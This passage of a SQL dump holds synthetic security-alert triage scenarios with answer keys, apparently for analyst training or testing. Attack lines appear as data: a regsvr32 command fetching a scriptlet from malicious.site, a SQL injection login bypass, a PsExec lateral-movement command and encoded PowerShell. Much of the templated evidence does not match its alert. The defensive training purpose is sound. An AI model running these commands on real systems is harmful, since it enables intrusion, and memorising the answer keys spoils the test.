domain\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The traffic volume was high due to a scheduled data exchange with a business partner.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(660, 'Suspicious PowerShell Command with Encoded Payload', 'high', 'Splunk', 'A PowerShell script was executed using an encoded command, indicating possible obfuscation tactics.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.12\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-WIN12\",\"command_line\":\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\"}', '2026-01-09 15:31:43', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used for obfuscation by malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are a known indicator of malicious activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc 
ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.306Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.1.12\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-WIN12\\\",\\\"command_line\\\":\\\"powershell.exe -enc ZQBlAGwAbABvACAAJwBoAGUAbABsAG8AdwBvAHIAbABkACcA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(661, 'Multiple Failed Login Attempts Detected', 'medium', 'Wazuh', 'A foreign IP address attempted to log in 23 times unsuccessfully, indicating a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.25\",\"username\":\"administrator\",\"hostname\":\"DC01\",\"failed_attempts\":23}', '2026-01-10 14:02:12', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common target for brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Frequent failed login attempts from a known malicious IP indicates a brute force attack.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"},{\"timestamp\":\"2026-02-01T20:31:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"},{\"timestamp\":\"2026-02-01T20:30:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"},{\"timestamp\":\"2026-02-01T20:29:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"},{\"timestamp\":\"2026-02-01T20:28:22.308Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"DC01\\\",\\\"failed_attempts\\\":23}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(662, 'Malicious Email with Phishing URL Detected', 'critical', 'Proofpoint', 'An email containing a known phishing URL was received, potentially targeting user credentials.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"email_sender\":\"no-reply@securebank.com\",\"username\":\"asmith\",\"hostname\":\"MAIL-SERVER\",\"url\":\"http://securebank-login.com\"}', '2026-01-11 10:11:51', '2026-02-16 18:02:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://securebank-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Phishing URL attempting to steal banking credentials.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@securebank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Spoofed domain resembling legitimate bank.\"}}],\"expected_actions\":[\"block_url\",\"notify_user\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Phishing URL detected in email, posing a threat to user credentials.\"}', 'Advanced', 'SIEM', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Email with Phishing URL Detected\",\"date\":\"2026-02-01T20:32:22.309Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(663, 'Lateral Movement via PSExec Detected', 'high', 'CrowdStrike', 'Suspicious PSExec activity detected, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"10.0.1.20\",\"username\":\"svc_admin\",\"hostname\":\"SRV-APP01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.1.20 -u svc_admin -p ******** -c cmd.exe\"}', '2026-01-10 21:33:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.1.20 -u svc_admin -p ******** -c cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage detected, commonly used for lateral movement by attackers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec usage from internal to internal IPs suggests lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(664, 'SQL Injection Attempt on Public Web Application', 'high', 'IDS/IPS', 'A potential SQL injection attack was detected targeting the login page of a public web application.', 'Web Attack', 'T1505', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T17:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"192.168.1.30\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"http://webapp.local/login\"}', '2026-01-10 00:59:01', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web-based attacks.\"}}],\"expected_actions\":[\"block_ip\",\"monitor_application\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"SQL injection attempt detected via suspicious payload on login page.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | 
head 100\"}}', 0),
(665, 'Data Exfiltration Detected via Suspicious Network Connection', 'critical', 'Firewall', 'A large amount of data was transferred to an external IP, indicating potential data exfiltration.', 'Data Exfil', 'T1048', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T18:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.2.14\",\"dst_ip\":\"198.51.100.75\",\"username\":\"nmartin\",\"hostname\":\"FILE-SRV01\",\"data_volume\":\"1.5GB\"}', '2026-01-10 00:24:48', '2026-03-14 14:53:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for numerous data exfiltration incidents.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious data transfer.\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unusual data volume transferred to a known malicious IP suggests data exfiltration.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(666, 'False Positive: Legitimate Certutil Activity Misclassified as Malicious', 'medium', 'SIEM', 'Certutil was executed on a user machine, typically flagged for potential malware download, but verified as a legitimate use case.', 'Malware', 'T1218.010', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T19:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.18\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jane.smith\",\"hostname\":\"HR-WORKSTATION\",\"command_line\":\"certutil.exe -addstore MyCompanyCert\"}', '2026-01-10 06:39:03', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil.exe -addstore MyCompanyCert\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"This use of certutil is legitimate as part of company policy.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.3.18\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil activity verified as legitimate based on internal policy use case.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore 
MyCompanyCert\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore MyCompanyCert\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore MyCompanyCert\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore MyCompanyCert\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore MyCompanyCert\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(667, 'Suspicious Regsvr32 Execution Detected', 'high', 'EDR', 'Regsvr32 was executed with a suspicious scriptlet URL, typical of a fileless malware attack.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T20:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.4.22\",\"dst_ip\":\"192.168.1.11\",\"username\":\"mroberts\",\"hostname\":\"DESKTOP-ROBERTS\",\"command_line\":\"regsvr32.exe /s /u /i:http://malicious.site/script.sct scrobj.dll\"}', '2026-01-10 11:54:15', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /u /i:http://malicious.site/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 with URL pointing to a known malicious site.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.4.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 execution with external scriptlet URL suggests fileless malware activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(668, 'False Positive: Legitimate Application Misidentified as Malware', 'medium', 'EDR', 'A legitimate application was flagged as suspicious due to anomalous behavior, but verified as a false positive.', 'Malware', 'T1204.002', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T21:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.5.25\",\"dst_ip\":\"192.168.1.12\",\"username\":\"kclark\",\"hostname\":\"FINANCE-PC\",\"command_line\":\"C:\\\\Program Files\\\\LegitApp\\\\update.exe\"}', '2026-01-10 14:40:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\LegitApp\\\\update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"The application is verified as legitimate and safe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The flagged application was verified as legitimate and safe, confirming a false positive.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 